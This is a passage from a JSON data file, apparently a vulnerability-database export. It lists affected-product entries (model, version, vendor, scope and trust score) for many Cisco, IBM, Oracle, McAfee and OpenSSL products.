}, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3394" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "jd edwards enterpriseone tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.2.1.1" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.3" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud web security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.8" }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "project openssl 1.0.2j", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.54" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.9.15.9.8" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.1.0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "communications diameter signaling router", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.0" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.0.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.0.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.4" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3387" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "15.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.55" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "openssh for gpfs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "rrdi", 